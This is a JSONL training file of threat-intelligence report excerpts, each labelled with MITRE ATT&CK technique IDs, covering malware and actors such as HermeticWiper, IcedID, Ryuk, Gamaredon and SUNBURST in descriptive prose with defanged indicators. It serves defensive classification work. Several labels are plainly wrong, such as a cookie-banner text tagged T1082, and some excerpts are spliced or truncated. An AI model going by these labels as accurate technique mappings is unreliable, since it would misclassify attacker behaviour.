llm-gateway/packages/fine-tuner/data/external/mitre-ttp-mapping.jsonl

{"text1":"The command processing function starts by substituting the main module name and path in the hosting process PEB, with the one of the default internet browser. The path of the main browser of the workstation is obtained by reading the registry value","labels":"['T1057']"}
{"text1":"Along the way, HermeticWiper\u2019s more mundane operations provide us with further IOCs to monitor for. These include the momentary creation of the abused driver as well as a system service. It also modifies several registry keys, including setting the SYSTEM\\CurrentControlSet\\Control\\CrashControl CrashDumpEnabled key to 0, effectively disabling crash dumps before the abused driver\u2019s execution starts","labels":"['T1569.002']"}
{"text1":"These Microsoft Office templates are hosted on a command and control server and the downloaded link is embedded in the first stage malicious document","labels":"['T1584.004']"}
{"text1":"Additionally, the IP 211[.]72 [.]242[.]120 is one of the hosts for the domain microsoftmse[.]com, which has been used by several KIVARS variants","labels":"['T1056.001', 'T1113']"}
{"text1":"When communicating with its C2 server, Psylo will use HTTPS with a unique user-agent of (notice the lack of a space between \"5.0\" and \"(Windows","labels":"['T1071.001']"}
{"text1":"In older versions, Valak downloads the second stage JS and uses only one obfuscation technique: Base64. The newer versions use XOR in addition to Base64","labels":"['T1027']"}
{"text1":"We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS","labels":"['T1218.005', 'T1059.005']"}
{"text1":"dlpumgr32.exe, a legitimate signed file that belongs to the DESlock+ product - DLPPREM32.DLL, a malicious DLL sideloaded by dlpumgr32.exe that loads and decodes DLPPREM32.bin - DLPPREM32.bin, a shellcode that decompresses and loads a launcher in memory - data.res, an encrypted file decoded by the launcher and contains two SysUpdate versions: one for a 32-bit architecture and another for a 64-bit architecture - config.res, an encrypted file decoded by the launcher and contains the SysUpdate configuration, such as the command-and-control (C&C) address","labels":"['T1027', 'T1082']"}
{"text1":"The malware has specific features that allow the attackers to perform operations related to online banking transactions, password stealing and clipboard monitoring. We also found various versions of the payload: the version focused on stealing data from victims in Brazil is typically unpacked, while the versions targeting banks in Chile and Mexico are packed with VMProtect or Themida","labels":"['T1027.002']"}
{"text1":"The size of the image is more than 600KB and embedded in it is the encrypted IcedID main module. The encryption algorithm is RC4 and the keys are also embedded in the image at specific offset","labels":"['T1027.003']"}
{"text1":"It is worth noting that in 2019, this actor used a fake file extension (*.png) for the MSI binary hosted on the attacker-controlled GitHub account","labels":"['T1583.006']"}
{"text1":"These variants include system information collection (operating system, computer name), keylogger output, and browser password collection from Internet Explorer, Chrome and Firefox","labels":"['T1082']"}
{"text1":"While Kimsuky is very active, the KONNI RAT has also been upgraded to a more evasive piece of malware","labels":"['T1027.002']"}
{"text1":"But first: How did they get the tools on the victim\u2019s systems. The adversary copied those tools over SMB from compromised system to compromised system wherever they needed these tools","labels":"['T1570']"}
{"text1":"This will also force the victim to re-open the browser using the newly written .lnk file, which is now loaded with Grandoreiro\u2019s malicious extension. This extension will load on every browser startup using this specific .lnk file","labels":"['T1547.001', 'T1036.005']"}
{"text1":"Endpoint Protection . The Trojan.Hydraq Incident . It has been about a week since news of the mysterious Hydraq Trojan (also known as Aurora) attack broke with the unveiling of a threat by Google to pull its operations out of China. Although concrete details of the attacks are not yet public, Google made reference to a number of Gmail accounts that were compromised during or after the attacks. Anatomy of the Attack For a number of years targeted attacks have nearly always followed the same modus operandi. In the more sophisticated attacks, the attacker will use a new zero day vulnerability, as obviously this will have a greater success rate. In this attack a PDF file was used to exploit the Adobe Acrobat, Reader, and Flash Player Remote Code Execution Vulnerability (CVE-2009-1862\/BID35759). This PDF installed a Trojan horse which was an earlier version of the current Trojan.Hydraq. This means the remote attacker has the ability to see in real time any user interface activity as if they were sitting right next to the user. As described in the previously posted blog (Hydraq - An Attack of Mythical Proportions), an unpatched Internet Explorer vulnerability (BID 37815) was used as one of the propagation vectors for this particular Trojan.Hydraq attack. This security hole allows remote exploitation, which means that attackers can run any malicious code of their liking on a victim\u2019s machine by taking advantage of the vulnerability. The number of computers we have observed being attacked or have been attacked is low as borne out by our field detection statistics. Prevention & Mitigation Trojan.Hydraq has been known to be spread through specially crafted PDF files and also through malicious Web sites","labels":"['T1005']"}
{"text1":"dbghelp.dll is incompatible with DEP (Data Exception Prevention), as shown in Figure 14. Thus, when it loads the operating system will disable DEP for the injected wmplayer.exe process. This means that code can be executed from memory regions that are not marked as executable in the context of this process","labels":"['T1562.001']"}
{"text1":"For each enumeration, it performs a breadth-first search to wipe the files in the logical drive while ignoring files located in the \"%HOMEDRIVE%\\Windows\" directory. It also only wipes files that have specific file extensions","labels":"['T1083']"}
{"text1":"It is distributed as a set of scripts and encrypted files and utilizes a PowerShell loader based on the Invoke-ReflectivePEInjection PowerSploit module to decode and inject the final payload DLL into memory","labels":"['T1055.001', 'T1055.001', 'T1027']"}
{"text1":"Registry traversal for Putty data exfiltration (left), code showing hostname, username and Private Key Files (right","labels":"['T1552.002']"}
{"text1":"While PotPlayerDB.dat is a variant of PlugX malware, TA416 has updated the payload by changing both its encoding method and expanding the payload\u2019s configuration capabilities. Historically, TA416 relied on the DLL launcher to decode the PlugX payload utilizing an XOR key included at the offset 0 within the PlugX DAT configuration file. One of the main ways it does this is by resolving API functions during runtime. This iteration of PlugX does standard API hashing, but only to resolve the address of the functions GetProcAddress as well as LoadLibrary. Once those functions are resolved properly, it loads the rest of the functions via their text name","labels":"['T1106']"}
{"text1":"After Tor is up and running, Siloscape uses it to connect to its C2 \u2013 an IRC server, using an onion address that was provided as a command line argument","labels":"['T1071']"}
{"text1":"One interesting thing to note is that the Keybase account used by the attacker to chat with their victims has the same logo of the Pay2Key EOSIO smart contract system","labels":"['T1585']"}
{"text1":"It should be noted that the Win32\/KillDisk.NBB variant used against media companies is more focused on destroying various types of files and documents. It has a long list of file extensions that it tries to overwrite and delete. The complete list contains more than 4000 file extensions","labels":"['T1485']"}
{"text1":"The LNK file contains a list of commands that will be executed upon running, and a blob that is a base64 encoded compressed payload","labels":"['T1027']"}
{"text1":"Fourth, this Darkhotel event is not based on the network protocol C2, but based on a custom file transfer control instruction","labels":"['T1135']"}
{"text1":"When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it. The resulting code has multiple layers of obfuscation","labels":"['T1047', 'T1218.005', 'T1559.001', 'T1027']"}
{"text1":"The threat used valid accounts against remote services: Cloud-based applications utilizing federated authentication protocols. Our incident responders analysed the credentials used by the adversary and the traces of the intrusion in log files. They uncovered an obvious overlap in the credentials used by this threat and the presence of those same accounts in previously breached databases. Besides that, the traces in log files showed more than usual login attempts with a username formatted as email address, e.g. username>@<email domain>. While usernames for legitimate logins at the victim\u2019s network were generally formatted like <domain>\\<username>. And attempted logins came from a relative small set of IP-addresses","labels":"['T1016', 'T1133']"}
{"text1":"CookieMiner reports all the wallet-related file paths to its remote server so it can later upload the files according to the C2 commands. These files usually include private keys of cryptocurrency wallets. If the victims use iTunes to backup files from iPhone to Mac (can be via Wi-Fi), their iPhone text messages (SMSFILE) will also be retrieved by the attackers (Figure 5","labels":"['T1083']"}
{"text1":"The JavaScript component is the first stage of the attack and can deploy other malware such as a C# spy component, Golden Chickens components or several Python-based tools. The name Evilnum was given to the C# component by other researchers in the past, but the JS component also has been referred to as Evilnum. We have named the group Evilnum as that is the name of their flagship malware, and we\u2019ll refer to the various malware pieces as components","labels":"['T1105']"}
{"text1":"But Ryuk isn\u2019t new to us\u2026 we\u2019ve been tracking it for years. More important than just looking at Ryuk ransomware itself, though, is looking at the operators behind it and their tactics, techniques, and procedures (TTPs)\u2014especially those used before they encrypt any data. The operators of Ryuk ransomware are known by different names in the community, including \u201cWIZARD SPIDER,\u201d \u201cUNC1878,\u201d and \u201cTeam9. The malware they use has included TrickBot, Anchor, Bazar, Ryuk, and others","labels":"['T1047', 'T1018']"}
{"text1":"The plugin is executed by using the Info command in the Lizar client application. A data structure containing the OS version, user name and computer name is sent to the server","labels":"['T1082']"}
{"text1":"Observed GoldMax C2 domains are high-reputation and high-prevalence, often acquired from domain resellers so that Whois records retain the creation date from their previous registration, or domains that may have been compromised. This tactic complements NOBELIUM\u2019s operational security strategy as these domains are more likely to be overlooked by security products and analysts based on their perceived long-lived domain ownership. Put simply, several domains we have shared as GoldMax C2 domains are only associated with NOBELIUM after the time they were re-sold or compromised \u2013 and Microsoft has provided that indicator context where it is available to us","labels":"['T1584.001']"}
{"text1":"The malware proceeds to blacklist certain processes such as \u201cwininit.exe\u201d when approaches memory scraping in order to speed necessary card scan logic","labels":"['T1057']"}
{"text1":"We were able to collect over fifty samples of the tools used by the Magic Hound campaign using the AutoFocus threat intelligence tool. The earliest malware sample we were able to collect had a compile timestamp in May 2016. The samples themselves ranged from IRC bots, an open source Python remote access tool, malicious macros, and others","labels":"['T1083']"}
{"text1":"From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. Strangely, in one case, the threat actors also appear to have used a domain name similar to the Foreign Policy Research Institute (FPRI) in a message purporting to be from CFR. If the exploit is successful, the threat actors will attempt to drop and execute QuasarRAT. Its called the \"packager trick\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \"scriptlet\" file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious scriptlet file (displayed below) clearly show the threat actor executing the initial \"qrat.exe\" dropper from the current user's %tmp% directory. The file, named Microsoft.Win32.TaskScheduler.dll, is digitally signed by a certificate from AirVPN. Conclusion . The addition of US-based think tanks to the list of organizations in the crosshairs of Patchwork shows an increasing diversity in the geographic regions being targeted. Volexity is actively tracking this group and the infrastructure currently in use for the benefit of its network security monitoring and threat intelligence customers","labels":"['T1189']"}
{"text1":"Apply the Microsoft security updates for MS17-010, including the updates for the Windows XP and Windows Server 2003 legacy operating systems. Disable SMBv1 on systems where it is not necessary (e.g. hosts that do not need to communicate with Windows XP and Windows 2000 systems). Carefully evaluate the need for allowing SMBv1-capable systems on interconnected networks compared to the associated risks. Scan networks for the presence of the DoublePulsar backdoor using plugins for tools such as Nmap. Use network auditing tools to scan networks for hosts that are vulnerable to the vulnerabilities described in MS17-010. Implement a backup strategy that includes storing data using offline backup media. Backups to locally connected, network-attached, or cloud-based storage are often insufficient because ransomware frequently accesses and encrypts files stored on these systems","labels":"['T1490']"}
{"text1":"SUPERNOVA is implemented as a modification to the existing \u2018app_web_logoimagehandler.ashx.b6031896.dll\u2019 module of the SolarWinds Orion application. The purpose of this module, in it\u2019s legitimate form, is to return the logo image configured by the user to various web pages of the SolarWinds Orion web application. In legitimate operation, this class only contains the ProcessRequest() and LogoImageHandler() methods, a private static Log object, and public boolean parameter IsReusable","labels":"['T1036.005']"}
{"text1":"AgentTesla is a .Net-based infostealer that has the capability to steal data from different applications on victim machines, such as browsers, FTP clients, and file downloaders. One of the new modules that has been added to this malware is the capability to steal WiFi profiles","labels":"['T1555']"}
{"text1":"TA551 has distributed different families of malware, including Ursnif (Gozi\/ISFB), Valak and IcedID. TA551 malspam spoofs legitimate email chains based on data retrieved from previously infected Windows hosts. This is a generic statement asking the recipient to open an attached ZIP archive using the supplied password. For example, if the spoofed sender is someone@companyname.com, the ZIP attachment would be named companyname.zip. In 2020, we also started seeing emails with info.zip or request.zip as the attached ZIP archive names. These password-protected ZIP attachments contain a Word document with macros to install malware. File names for the extracted Word documents follow noticeable patterns that have evolved as this campaign has progressed. URLs generated by the associated Word macros also follow noticeable patterns that have also evolved as this campaign has progressed","labels":"['T1204.002']"}
{"text1":"The plugins are variously designed to load other tools like Mimikatz or Carbanak, retrieve information from the victim machine, take screenshots, harvest credentials, retrieve browser histories, and more","labels":"['T1217']"}
{"text1":"During our analysis, we successfully extracted the command line argument to execute its payload. The following command is used to execute the payload","labels":"['T1574.002']"}
{"text1":"When receiving HTTP commands, the WellMess server is setup to receive POST requests that contain RC6 encrypted cookies. The server decrypts the cookies using a hardcoded RC6 key and expects the decrypted data to contain no more than four tags","labels":"['T1140', 'T1573.001']"}
{"text1":"Despite the notion that modern cybersecurity protocols have stopped email-based attacks, email continues to be one of the primary attack vectors for malicious actors \u2014 both for widespread and targeted operations. Recently, Cisco Talos has observed numerous email-based attacks that are spreading malware to users at both a large and small scale. In this blog post, we analyze several of those campaigns and their tactics, techniques and procedures (TTPs). These campaigns were all observed between mid-May and early July of this year, and can likely be attributed to one, or possibly two, groups. The attacks have become more sophisticated, and have evolved to evade detection on a continual basis. Other researchers have attributed these attacks to a group known as the Cobalt Gang, which has continued its activities even after the arrest of its alleged leader in Spain this year. Simple campaigns typically use a single technique and often embed the final executable payload into the exploit document. The emails either contain a URL pointing to one of the three document types or have initial attack stages attached outright","labels":"['T1059.007']"}
{"text1":"After an initial dormant period of up to two weeks, it retrieves and executes commands, called \u201cJobs\u201d, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. TEARDROP and BEACON Malware Used . Multiple SUNBURST samples have been recovered, delivering different payloads. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. The credentials used for lateral movement were always different from those used for remote access. Detection Opportunity . Organizations can use HX\u2019s LogonTracker module to graph all logon activity and analyze systems displaying a one-to-many relationship between source systems and accounts. After an initial dormant period of up to two weeks, it retrieves and executes commands, called \u201cJobs\u201d, that include the ability to transfer and execute files, profile the system, and disable system services. The userID is encoded via a custom XOR scheme after the MD5 is calculated. Commands are extracted from HTTP response bodies by searching for HEX strings using the following regular expression: \"\\{[0-9a-f-]{36}\\}\"||\"[0-9a-f]{32}\"||\"[0-9a-f]{16}\". Command data is spread across multiple strings that are disguised as GUID and HEX strings. The extracted message is single-byte XOR decoded using the first byte of the message, and this is then DEFLATE decompressed","labels":"['T1027']"}
{"text1":"IcedID uses TLS in all of its communication but the certificate is self-signed. They can be spotted, as they use this kind of a self-signed certificate. The keyword \u201cInternet Widgits Pty Ltd\u201d is also being used by Trickbot, another banking malware, and it is believed that Trickbot and IcedID are cousins","labels":"['T1573.002', 'T1185']"}
{"text1":"In December 2019, another version of the AppleJeus malware was identified on Twitter by a cybersecurity company based on many similarities to the original AppleJeus malware. In contrast, open-source reporting stated that the Windows version might have been downloaded via instant messaging service Telegram, as it was found in a \u201cTelegram Downloads\u201d folder on an unnamed victim","labels":"['T1566.002']"}
{"text1":"PowerSploit can be used as a tool for the discovery of stored credentials. Specifically it supports the following modules which will check for credentials encrypted or plain-text in various files and in the registry","labels":"['T1552.002']"}
{"text1":"MegaCortex v1 was executed manually by threat actors using a separate batch file to kill security processes and stop\/disable services related to security, backup and shadow copies. That same batch file was subsequently used to execute the MegaCortex binary with a Base64 key as a command-line argument","labels":"['T1489', 'T1562.001']"}
{"text1":"Capable of stealing documents sent to the printer queue. Data gathered for victim recon includes the backup list for Apple mobile devices. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies","labels":"['T1005']"}
{"text1":"First observed by Microsoft on Jan. 13, 2022, WhisperGate malware is computer network attack (CNA) malware aimed at deleting Microsoft Windows Defender and corrupting files on the target. It consists of two samples: One appears as ransomware while the other is a beaconing implant used to deliver an in-memory Microsoft Intermediate Language (MSIL) payload. At the time of writing, there are two known samples identified as WhisperGate: Stage1.exe and Stage2.exe. Stage1.exe purports to be ransomware, as it overwrites the target\u2019s master boot record with 512 bytes and upon reboot displays the following ransom note","labels":"['T1561.002']"}
{"text1":"The second family of Lazarus malware appearing in recent months has, as far as we are aware, received little to no analysis from researchers, possibly due to its targeted nature and a lack of ITW sightings","labels":"['T1105']"}
{"text1":"These cookies are necessary for the website to function and cannot be switched off in our systems. They are usually only set in response to actions made by you which amount to a request for services, such as setting your privacy preferences, logging in or filling in forms. You can set your browser to block or alert you about these cookies, but some parts of the site will not then work. These cookies do not store any personally identifiable information","labels":"['T1082']"}
{"text1":"Of the tools listed above, many were obfuscated with VMProtect (v1.60-2.05), a recurring theme with BackdoorDiplomacy tools","labels":"['T1027']"}
{"text1":"An uptick in activity from GRIM SPIDER, a subgroup of the criminal enterprise CrowdStrike Intelligence tracks as WIZARD SPIDER, has led to the identification of consistent actions employed to carry out their attacks. As part of their initial compromise \u2014 usually as a download from a spam email \u2014 they gain a foothold with their modular TrickBot malware, which was developed and is principally operated by WIZARD SPIDER. Once TrickBot is executed, new enumeration modules are downloaded onto the compromised machine to facilitate WIZARD SPIDER\u2019s spread in search of credentials with the aim of gaining access to the domain controller. The criminal actors use RDP to perform lateral movement and explore the victim environment, with an end result of gaining access to the domain controller. Once this access has been achieved, GRIM SPIDER is able to deploy the Ryuk ransomware to the entire network","labels":"['T1071.001', 'T1021.001', 'T1204.002', 'T1041']"}
{"text1":"Unlike recent variants of Mirai and Gafgyt that target vulnerable Linux systems via randomly generated IP addresses, Xbash also scans and trawls through domain names. The C&C scans for specific destinations\u2019 known vulnerabilities in Hadoop, Redis and ActiveMQ (CVE-2016-3088) for self-propagation. Hadoop\u2019s unauthenticated command execution flaw discovered in October 2016, as well as the Redis arbitrary and remote command execution vulnerability disclosed in October 2015, have yet to be assigned CVE numbers. Based on the active C&C traffic, it scans and probes for open TCP or UDP ports such as HTTP, VNC, MySQL\/MariaDB, Telnet, FTP, MongoDB, RDP, ElasticSearch, Oracle Database, CouchDB, Rlogin and PostgreSQL. While the malware uses a weak username and password dictionary to brute force itself into the service, it is also able to update its set from the C&C server, delete all the databases, and display the ransom message","labels":"['T1203']"}
{"text1":"As can be seen in the figure above, the packer used for CVE-2019-0803 is very similar to the one used in CVE-2017-0005. The file was compiled on September 18, 2018, and is also internally named \u201cAdd.dll\u201d. Like the previously packed exploit, CVE-2019-0803 also has an export function named \u201cAddByGod\u201d and contains debug information","labels":"['T1027.002']"}
{"text1":"Although, the use of target names with actuating themes is not new to this group, there has been a significant uptick in the number of emails received and this campaign has been persistently active for the past\u00a0few weeks","labels":"['T1566.002']"}
{"text1":"This function is the supporting functionality for WinVNC. To allow the VNC session to connect, the current network socket WSAProtcol_Info structure is written to a named pipe prior to calling zxFunction001","labels":"['T1021.005']"}
{"text1":"We also analyzed further Gamaredon tools that have the ability to inject malicious macros and remote templates into existing Office documents. Tools linked to Gamaredon and discussed in this blogpost are detected as variants of MSIL\/Pterodo, Win32\/Pterodo or Win64\/Pterodo by ESET\u2019s products. Contrary to other APT groups, the Gamaredon group seems to make no effort in trying to stay under the radar. It also saves to disk the malicious OTM file (Outlook VBA project) that contains a macro, the malicious email attachment and, in some cases, a list of recipients that the emails should be sent to. Office macro injection module \u2013 CodeBuilder . We analyzed different variants of malicious modules used by the Gamaredon group to inject malicious macros or remote templates into documents already present on the compromised system. Module updates . Interestingly, some of the custom tools described in Palo Alto Networks\u2019 2017 blogpost on Gamaredon are still being updated and in use today. C# compiler module . This .NET executable, similar to many other tools used by the Gamaredon group, uses obfuscation techniques such as junk code insertion and string obfuscation. As with many other tools used by the Gamaredon group, they come in four different coding languages: C\/C++, C#, batch file and VBScript. Quality of execution . We were able to collect numerous different samples of malicious scripts, executables and documents used by the Gamaredon group throughout their campaigns. Conclusion . Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module","labels":"['T1547.001']"}
{"text1":"b.wnry \u2014 Bitmap image used as desktop wallpaper (shown in Figure 2) - c.wnry \u2014 Configuration containing Tor command and control (C2) addresses, Bitcoin addresses, and other data - r.wnry \u2014 Ransom demand text - s.wnry \u2014 ZIP archive containing Tor software to be installed on the victim\u2019s system; saved in TaskData directory - t.wnry \u2014 Encrypted DLL containing file-encryption functionality - u.wnry \u2014 Main module of the WCry ransomware \u201cdecryptor\u201d - taskdl.exe \u2014 WNCRYT temporary file cleanup program - taskse.exe \u2014 Program that displays decryptor window to RDP sessions - msg \u2014 Directory containing Rich Text Format (RTF) ransom demands in multiple languages","labels":"['T1090.003']"}
{"text1":"CISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment","labels":"['T1090', 'T1021.004', 'T1572']"}
{"text1":"In this campaign, the group sent spear phishing emails containing malicious documents that led to the installation of the UPPERCUT backdoor. Part of this blog post will discuss the updates and differences we have observed across multiple versions of this backdoor","labels":"['T1204.002']"}
{"text1":"After the ransomware is executed, Clop appends the .clop extension to the victim's files. We have observed different variants using different extensions, such as \u201c.CIIp\u201d, \u201c.Cllp\u201d and \u201c.C_L_O_P\u201d. Different versions of the ransom note have also been observed after encryption. Depending on the variant, any of these ransom text files could drop: \u201cClopReadMe.txt\u201d, \u201cREADME_README.txt\u201d, \u201cCl0pReadMe.txt\u201c and \u201cREAD_ME_!!!.TXT","labels":"['T1486']"}
{"text1":"H1N1 has self-propagation\/lateral movement functionality (which requires user interaction) via mapped\/available network shares or mounted USB devices","labels":"['T1080']"}
{"text1":"Another component of the KGH suite is the m.dll module, which is an information stealer that harvest data from browsers, Windows Credential Manager, WINSCP and mail clients","labels":"['T1114.001']"}
{"text1":"Before the driver is loaded, the malware disables crash dump by setting the following registry key","labels":"['T1070', 'T1562.006', 'T1112']"}
{"text1":"Conclusion Tick has left a trail of evidence indicating that its activity began as early as 2006. In earlier attacks, the group used malicious Microsoft Word documents to infect victims, with compromised websites being added to the mix as a more recent attack vector","labels":"['T1204.002']"}
{"text1":"Gathering system information and sending it to the control server. The system information gathered from the endpoint includes: MAC address of the endpoint Computer Name Product name from HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion ProductName This information is concatenated into a single string in the format: \u201cMAC_Address||ComputerName||ProductName\u201d and is sent to the control server - MAC address of the endpoint - Computer Name - Product name from HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion ProductName - This information is concatenated into a single string in the format: \u201cMAC_Address||ComputerName||ProductName\u201d and is sent to the control server - Recording HTTP requests from the control server to the temporary file prx in the implant\u2019s install directory with the current system timestamp","labels":"['T1012']"}
{"text1":"Credential hopping for obscuring lateral movement - Office 365 (O365) Service Principal and Application hijacking, impersonation and manipulation - Stealing browser cookies for bypassing multifactor authentication - Use of the TrailBlazer implant and the Linux variant of GoldMax malware - Credential theft using Get-ADReplAccount","labels":"['T1078.002', 'T1550.001']"}
{"text1":"In the analyzed sample the RAT component was named \u201cBotDLL[.]dll\u201d. It has some typical RAT functionality such as command shell, video recording of the screen, remote desktop, port forwarding, and file system access","labels":"['T1125', 'T1090', 'T1005']"}
{"text1":"This final cluster appears to serve as the C2 infrastructure for a custom remote administration tool called Pteranodon. It is capable of downloading and executing files, capturing screenshots and executing arbitrary commands on compromised systems","labels":"['T1113']"}
{"text1":"Introduced in macOS 10.11, this utility has only one publicly documented use, which is to return the status of the System Integrity Protection tool. The csrutil tool is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not","labels":"['T1082']"}
{"text1":"Shortly after this RTF document is opened, the remaining stages of the Inception malware are found executing on the system. The loader DLL is responsible for decrypting and injecting the core payload DLL into memory, from an encrypted file present on disk. The core payload DLL's main function is to gather system information, execute other malware in the form of plugins, and update itself","labels":"['T1204.002']"}
{"text1":"The NOKKI malware itself has been updated in the short period of time it has been observed, moving from FTP to HTTP for C2 operations. The malware is modular in nature, and based on analysis of the information gathering module, it is highly likely the NOKKI operators are the same as the KONNI operators","labels":"['T1071.001', 'T1071.002']"}
{"text1":"The network mode being set to the host along with the container trying to be deployed as a privileged container. The Docker Hub account of MegawebMaster has numerous public images, five of which have TeamTNT utilities with a significant amount of downloads. These five images include dockgeddon, docker, tornadopw, and dcounter (T1204.003","labels":"['T1496']"}
{"text1":"TeamTNT has also been spotted using a malicious Docker image which can be found on Docker Hub to infect its victims\u2019 servers","labels":"['T1610', 'T1071.001']"}
{"text1":"Even simple API calls were obfuscated, and instead of just calling the functions, Siloscape made the effort to use the Native API (NTAPI) version of the same function","labels":"['T1106', 'T1027']"}
{"text1":"The DLL expects the export named 'Add' to be used when initially loaded. When this function is executed PLAINTEE executes the following command in a new process to add persistence","labels":"['T1059.003', 'T1547.001']"}
{"text1":"In this version, the communication protocol with the C&C server was also upgraded to use AES encryption","labels":"['T1573.001']"}
{"text1":"The domain name is generated based on the current month and year values, e.g. for August 2017 the domain name used would be \u201cnylalobghyhirgh.com","labels":"['T1568.002']"}
{"text1":"HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. The malware\u2019s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell","labels":"['T1059.003']"}
{"text1":"The attackers then attempt to gain root access to the server by setting up a local privileged user named \u2018hilde\u2019 on the host server and use it in order to connect back via SSH","labels":"['T1021.004']"}
{"text1":"The Russia-linked Shuckworm group (aka Gamaredon, Armageddon) is continuing to conduct cyber-espionage attacks against targets in Ukraine. Over the course of recent months, Symantec\u2019s Threat Hunter Team, a part of\u00a0Broadcom Software, has found evidence of attempted attacks against a number of organizations in the country","labels":"['T1057', 'T1204.002']"}
{"text1":"After the malware has invoked a method named _s_is_high_time and waited on several timers to expire, it begins encrypting the (unfortunate) user\u2019s files, by invoking a function named carve_target. It then generates a list of files to encrypt, by invoking the get_targets function, passing in the is_file_target as a filter function. This filter function filters out all files, except those that match certain file extensions. The encrypted list of extensions is hard-coded at address 000000010001299E within the malware. In part one of this blog post series, we decrypted all the embedded string, thus can readily examine the decrypted list","labels":"['T1486']"}
{"text1":"Timeline . OSX\/FruitFly: 1) 2) Remove the malicious launch agent plist file ~\/Library\/LaunchAgents\/com.client.client.plist 3) Remove the malware's persistent perl script & file. Ok, so the attackers are using an open-source multi-stage post-exploitation agent. Unfortunately this file is now inaccessible. The author of the thread announced a RAT dubbed Proton, intended for installation exclusively on MAC OS devices. Finally, the malware modifies the infected host's network settings in order to set up a proxy who's address is (dynamically) specified via a remote proxy auto-configuration (PAC) file. As it's a binary plist file, dump its contents with the plutil utility (using the -p commandline flag): . As the KeepAlive key has been set to 1 (true), the Launch Daemon will be automatically started everytime the infected system is rebooted. MacRansom is the the first 'Ransomware-as-a-Service' for macOS, that aims to encrypt (ransom) all user's files. Then these files will be passed (to a new instance) of the malware, in order to be encrypted. Thus it appears that once encrypted, the files are pretty much gone for good (save for a perhaps a brute force decryption attack). Good news, RansomWhere. Using the neat 'Suspicious Package' application, we can statically examine this script: In short, it persists CPUMeaner as a launch agent via the \/Library\/LaunchAgents\/com.osxext.cpucooler.plist file","labels":"['T1140']"}
{"text1":"Various scans and queries are used to find proxy settings, domain controllers, remote desktop services, Citrix services, and network shares. Otherwise, a jump host or other system likely used by domain admins is found and equipped with a Cobalt Strike beacon","labels":"['T1012']"}
{"text1":"This attack begins with a spear phishing attack through a targeted email campaign. Over 80 files were sent to 40 email accounts within the organization, within the span of about an hour. The email contains Microsoft Excel attachments with malicious macros","labels":"['T1566.001']"}
{"text1":"The original Microsoft Excel spreadsheet is copied into the %TEMP% directory - The embedded object \u201cxl\\embeddings\\oleObject1[.]bin\u201d inside the Microsoft Excel spreadsheet is copied into the %TEMP% directory - The DLL inside oleObject1.bin is extracted and copied into %APPDATA% by the \u201cReadAndWriteExtractedBinFile\u201d function - The DLL is loaded with LoadLibraryA - The DLL\u2019s exported function, such as \u201cGet2\u201d, is run by the macro","labels":"['T1055.001']"}
{"text1":"Please note that the Ecipekac Layer III loader module is embedded in the encrypted Layer II loader","labels":"['T1027']"}
{"text1":"This feature generates a stageless Beacon payload artifact, hosts it on Cobalt Strike\u2019s web server, and presents a one-liner to download and run the artifact","labels":"['T1197']"}
{"text1":"The\u00a0NetWire\u00a0payloads in all observed campaigns included nearly identical configurations. Specifically, the C2 domain clients[.]enigmasolutions[.]xyz and the password were\u00a0the same","labels":"['T1105']"}
{"text1":"Upon exploitation, a GH0ST RAT variant is delivered to the victims\u2019 system, which calls out to a previously known APT18 CnC address 223.25.233.248. GH0ST RAT is a backdoor derived from public source code","labels":"['T1070.001', 'T1059']"}
{"text1":"If the attack progresses, the user will be taken to the download of an MS Word document containing malicious macros that has very low detection rate at the moment of this campaign delivery. From a metadata standpoint, the document does not include any specific signal or characteristic that would help us tracking documents from the same author, as shown in Figure 6","labels":"['T1566.001', 'T1059.005']"}
{"text1":"Each Casbaneiro sample using this method has the buyer\u2019s ID hardcoded in its data. When it downloads such configuration file, it parses it and finds the line that is intended for the specific buyer\u2019s ID and downloads and executes the payload","labels":"['T1547.001', 'T1036.005', 'T1105']"}
